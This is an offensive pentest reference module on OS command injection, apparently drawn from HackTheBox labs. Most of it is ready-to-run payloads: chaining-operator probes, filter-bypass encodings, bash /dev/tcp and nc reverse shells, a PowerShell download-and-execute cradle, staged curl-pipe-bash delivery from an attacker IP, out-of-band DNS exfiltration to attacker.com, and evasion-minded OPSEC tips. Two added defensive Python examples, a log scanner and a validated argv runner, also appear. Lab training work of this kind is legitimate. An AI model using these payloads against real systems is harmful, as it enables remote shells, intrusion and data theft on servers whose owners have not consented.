
# Command Injection

## Overview

Command injection vulnerabilities occur when user-supplied input is passed directly to a system shell command without proper sanitization. This allows an attacker to execute arbitrary OS commands on the server. Command injection is distinct from code injection -- it targets the underlying operating system shell rather than the application language. It is commonly found in applications that execute system utilities for ping, nslookup, file operations, backup scripts, or image processing.

## Prerequisites

  • Identified input that likely triggers a system command (ping, traceroute, DNS lookup, file operations)
  • Knowledge of the target OS (Linux vs Windows -- different command chaining syntax)
  • Netcat for reverse shell listener
  • Python HTTP server for file staging

## Detection & Enumeration

### Basic Injection Testing

```bash
# Test for command execution via timing
curl -s -w '\nTime: %{time_total}s\n' 'http://target.htb/ping?ip=127.0.0.1'
curl -s -w '\nTime: %{time_total}s\n' 'http://target.htb/ping?ip=127.0.0.1;sleep+5'
# If second request takes ~5 seconds longer: command injection confirmed

# Common test payloads (Linux)
; id
| id
|| id
& id
&& id
`id`
$(id)

# Common test payloads (Windows)
; dir
| dir
|| dir
& dir
&& dir
```

### Command Chaining Operators by OS

| Operator | Linux | Windows | Description |
|---|---|---|---|
| `;` | Yes | No | Sequential execution |
| `\|` | Yes | Yes | Pipe output |
| `\|\|` | Yes | Yes | OR (if previous fails) |
| `&` | Background | Yes | Background / AND |
| `&&` | Yes | Yes | AND (if previous succeeds) |
| `` ` `` | Yes | No | Command substitution |
| `$()` | Yes | No | Command substitution |
| `%0a` | Yes | No | Newline (URL-encoded) |
| `%0d%0a` | Yes | No | CRLF |

### Blind Command Injection Detection

```bash
# Time-based detection
curl -s 'http://target.htb/ping?ip=127.0.0.1;sleep+5'

# Out-of-band detection -- start listener first
nc -lnvp 80
curl -s 'http://target.htb/ping?ip=127.0.0.1;curl+http://10.10.14.40:80/test'

# DNS-based OOB
curl -s 'http://target.htb/ping?ip=127.0.0.1;nslookup+$(whoami).attacker.com'

# Write to webroot and verify
curl -s 'http://target.htb/ping?ip=127.0.0.1;echo+test+>+/var/www/html/ping.txt'
curl -s 'http://target.htb/ping.txt'
```

## Exploitation / Execution

### Direct Command Execution

```bash
# Linux: Basic command execution
curl -s -X POST 'http://target.htb/exec' -d 'cmd=127.0.0.1;id'
curl -s 'http://target.htb/ping?ip=127.0.0.1|id'

# Windows: Basic command execution
curl -s 'http://target.htb/ping?ip=127.0.0.1|dir+C:\'

# Reverse shell payloads (Linux)
curl -s 'http://target.htb/ping?ip=127.0.0.1;bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.40/4444+0>%261"'
curl -s 'http://target.htb/ping?ip=127.0.0.1;nc+-e+/bin/bash+10.10.14.40+4444'

# Reverse shell payloads (Windows)
curl -s 'http://target.htb/ping?ip=127.0.0.1|powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString(\'http://10.10.14.40/shell.ps1\')"'
```

### Filter Bypass Techniques

```bash
# Space bypass using ${IFS} (Linux)
curl -s 'http://target.htb/cmd?host=127.0.0.1;cat${IFS}/etc/passwd'

# Space bypass using %09 (tab, URL-encoded)
curl -s 'http://target.htb/cmd?host=127.0.0.1;cat%09/etc/passwd'

# Newline bypass
curl -s 'http://target.htb/cmd?host=127.0.0.1%0aid'

# Using backticks for command execution
curl -s 'http://target.htb/cmd?host=`id`'

# Using $() for command execution
curl -s 'http://target.htb/cmd?host=$(id)'

# Base64 encoding bypass (if filtered)
curl -s 'http://target.htb/cmd?host=127.0.0.1;echo+Y2F0IC9ldGMvcGFzc3dk|base64+-d|bash'
# Decoded: cat /etc/passwd

# Hex encoding
curl -s 'http://target.htb/cmd?host=127.0.0.1;echo+$'\x69\x64''
```
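The operator table and the filter-bypass encodings above are also the signatures a defender looks for in request logs. The following is an added example, not part of the original module: a log-review helper that URL-decodes each query parameter from constructed access-log lines (decoding twice so a `%253b`-style double encoding is seen) and flags the chaining operators, `${...}` expansions, `$()`/backtick substitution, tab and newline space-substitutes, base64/hex unwrapping, out-of-band tools and `sleep`-based probes listed on this page. The sample log, the source IP (TEST-NET-3) and all function names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the operator table and filter-bypass section above.
# Each is applied to a fully URL-decoded parameter value.
INDICATORS = [
    ("chaining",     re.compile(r"[;&|\r\n]")),                         # ; | || & && newline/CRLF
    ("substitution", re.compile(r"`|\$\(")),                            # `cmd` and $(cmd)
    ("expansion",    re.compile(r"\$\{[A-Za-z_]")),                     # ${IFS}, ${HOME:0:1}
    ("whitespace",   re.compile(r"\t")),                                 # %09 tab standing in for a space
    ("decoder",      re.compile(r"base64\s+-d|\\x[0-9a-fA-F]{2}")),     # base64 / hex unwrapping
    ("callback",     re.compile(r"/dev/tcp/|\b(?:curl|wget|nc|nslookup)\b")),  # OOB or staging tools
    ("timing",       re.compile(r"\bsleep\b")),                         # blind, time-based probe
]

# Request line of a combined-format access log entry.
REQUEST_RX = re.compile(r'"(?:GET|POST|PUT)\s+(\S+)\s+HTTP/')

# Constructed sample log (not real traffic); the client IP is from TEST-NET-3.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:12:00:01 +0000] "GET /ping?ip=8.8.8.8 HTTP/1.1" 200 312
203.0.113.5 - - [01/Jan/2024:12:00:02 +0000] "GET /ping?ip=127.0.0.1;sleep+5 HTTP/1.1" 200 312
203.0.113.5 - - [01/Jan/2024:12:00:03 +0000] "GET /cmd?host=127.0.0.1;cat${IFS}/etc/passwd HTTP/1.1" 200 1874
203.0.113.5 - - [01/Jan/2024:12:00:04 +0000] "GET /cmd?host=127.0.0.1%0aid HTTP/1.1" 200 120
203.0.113.5 - - [01/Jan/2024:12:00:05 +0000] "GET /cmd?host=%24%28id%29 HTTP/1.1" 200 120
203.0.113.5 - - [01/Jan/2024:12:00:06 +0000] "GET /cmd?host=127.0.0.1%253bid HTTP/1.1" 200 120
"""


def decode_param(raw, rounds=2):
    """URL-decode up to `rounds` times so a double-encoded payload (%253b -> %3b -> ;) is seen."""
    value = raw
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_query(query):
    """Split on '&' only. A literal '&' is a parameter separator to the server, so a
    payload that needs '&' inside a value has to send %26, which decode_param recovers."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, raw = part.partition("=")
            pairs.append((key, raw))
    return pairs


def inspect_request(path):
    """Return {param: [indicator names]} for the suspicious parameters of one request path."""
    query = path.partition("?")[2]
    findings = {}
    for key, raw in split_query(query):
        hits = [label for label, rx in INDICATORS if rx.search(decode_param(raw))]
        if hits:
            findings[key] = hits
    return findings


def scan_log(text):
    """Return [(line_no, request_path, findings)] for every flagged request in the log text."""
    alerts = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RX.search(line)
        if match and (findings := inspect_request(match.group(1))):
            alerts.append((line_no, match.group(1), findings))
    return alerts


if __name__ == "__main__":
    for line_no, path, findings in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {path} -> {findings}")
```

Two limits worth knowing when running this over real logs: a standard access log only records the query string, so the POST body used by the `/exec` endpoint on this page is invisible to it unless a body-logging reverse proxy or WAF sits in front; and the `callback` and `timing` words will need tuning for any parameter where they can legitimately occur.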

### Practical Command Injection (CozyHosting HTB Technique)

```bash
# The application runs: ssh -i id_rsa USERNAME@HOSTNAME
# HOSTNAME validates against regex, but USERNAME does not

# Test callback with ${IFS} space bypass
# Submit in username field: test;curl${IFS}http://10.10.14.49:7000;
curl -s -X POST 'http://cozyhosting.htb/exec' \
  -d 'username=test;curl${IFS}http://10.10.14.49:7000;&hostname=127.0.0.1'

# Stage a reverse shell script and execute it
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.14.49/4444 0>&1' > rev.sh
python3 -m http.server 7000 &
nc -lnvp 4444 &

curl -s -X POST 'http://cozyhosting.htb/exec' \
  -d 'username=test;curl${IFS}http://10.10.14.49:7000/rev.sh|bash;&hostname=127.0.0.1'
```
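The root cause is the same in the `ping?ip=` handler used throughout this module and in the CozyHosting `ssh -i id_rsa USERNAME@HOSTNAME` case: user input lands in a command string that a shell parses, and at least one field is never validated (here HOSTNAME was checked, USERNAME was not). The following is an added defensive example, not code from the page or from the CozyHosting application (whose language and source the page does not show); it places the vulnerable string-concatenation form beside an argv-based form in which every interpolated field is allow-list validated and nothing passes through a shell. The validator regexes and function names are the example's own assumptions.

```python
import ipaddress
import re
import shlex
import subprocess

# Allow-lists for every field that reaches a command line. These rules are the
# example's own assumptions; tighten them to the deployment's real naming policy.
USERNAME_RX = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HOSTNAME_RX = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def unsafe_ping_command(user_ip):
    """The vulnerable pattern: input concatenated into one string that a shell parses,
    so ';', '|', '$()' and backticks inside user_ip are interpreted as operators."""
    return "ping -c 1 " + user_ip


def validate_ip(value):
    """Accept only a literal IPv4/IPv6 address; anything else is rejected."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        raise ValueError(f"not an IP address: {value!r}") from None


def validate_hostname(value):
    if not HOSTNAME_RX.match(value):
        raise ValueError(f"invalid hostname: {value!r}")
    return value


def validate_username(value):
    # First character must be a letter or '_'. Besides excluding shell metacharacters,
    # this blocks a leading '-', which ssh would otherwise read as an option.
    if not USERNAME_RX.match(value):
        raise ValueError(f"invalid username: {value!r}")
    return value


def safe_ping_argv(user_ip):
    """Hardened form: the validated value is its own argv element; no shell is involved."""
    return ["ping", "-c", "1", validate_ip(user_ip)]


def safe_ssh_argv(username, hostname):
    """Every interpolated field is validated; the CozyHosting case checked only HOSTNAME."""
    target = f"{validate_username(username)}@{validate_hostname(hostname)}"
    return ["ssh", "-i", "id_rsa", target]


def shell_string_if_unavoidable(argv):
    """If a shell string truly cannot be avoided, quote each already-validated element."""
    return " ".join(shlex.quote(part) for part in argv)


def run_argv(argv, timeout=10):
    """Execute with shell=False: argv elements are never re-parsed for metacharacters."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    print(unsafe_ping_command("127.0.0.1;id"))   # the operator survives into the shell string
    print(safe_ping_argv("127.0.0.1"))
    for bad in ("127.0.0.1;id", "`id`", "$(id)"):
        try:
            safe_ping_argv(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The order matters: validate first, then pass the value as a single argv element. Passing an argv list alone already stops operator injection, but without the allow-list a hostile value can still become an unexpected option or address for the invoked program, which is why the username check refuses a leading `-`.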

### Maltrail Command Injection (Sau HTB Technique)

```bash
# Maltrail v0.53 is vulnerable to unauthenticated command injection
# via the username parameter in the login endpoint

# Download public PoC
curl -s https://www.exploit-db.com/download/51676 > exploit.py

# Execute exploit through SSRF proxy basket
python3 exploit.py 10.10.14.6 4444 http://10.10.11.224:55555/<basket_id>
```

### Staged Reverse Shell via Web Delivery

```bash
# 1. Create shell script
echo '#!/bin/bash' > shell.sh
echo 'bash -i >& /dev/tcp/10.10.14.40/9001 0>&1' >> shell.sh

# 2. Host it
python3 -m http.server 80 &

# 3. Start Netcat listener
nc -lnvp 9001 &

# 4. Trigger download and execution
curl -s 'http://target.htb/cmd?ip=127.0.0.1;curl+10.10.14.40/shell.sh|bash'

# Same technique via wget
curl -s 'http://target.htb/cmd?ip=127.0.0.1;wget+-O-/tmp/s+10.10.14.40/shell.sh;bash+/tmp/s'
```

## Common Pitfalls

  • Whitespace filtered -- use ${IFS}, %09 (tab), %0a (newline), or < (input redirect)
  • Slashes filtered -- use environment variables: ${HOME:0:1} = /
  • Quotes filtered -- use hex or base64 encoding to avoid special characters
  • Pipes filtered -- use output redirection or backticks instead
  • Semicolons filtered -- try ||, &&, |, %0a
  • Reverse shell not connecting -- check firewall, try different ports (80, 443, 53)
  • nc -e not available -- use bash -i >& /dev/tcp/host/port or python/powershell reverse shells

## OPSEC Considerations

  • Reverse shell connections on nonstandard ports trigger NIDS alerts
  • Multiple consecutive command injection attempts generate high-volume error logs
  • curl/wget to external IPs leaves entries in bash history and web logs
  • sleep commands for blind detection cause observable latency
  • Out-of-band DNS lookups generate unusual DNS query patterns

## Post-Exploitation Value

  • Direct OS command execution as the web server user
  • File system access for configuration enumeration
  • Network enumeration of internal services
  • Platform for kernel exploit or privilege escalation

## Cross-References

### Tool References

| Tool | Link |
|---|---|
| commix | https://github.com/commixproject/commix |
| RevShells | https://www.revshells.com |
| PayloadsAllTheThings CMDi | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection |

### Source Machines

  • CozyHosting (Easy, Linux) -- Command injection in SSH username field, ${IFS} space bypass, curl+pipe+bash
  • Sau (Easy, Linux) -- Maltrail v0.53 unauthenticated command injection via username parameter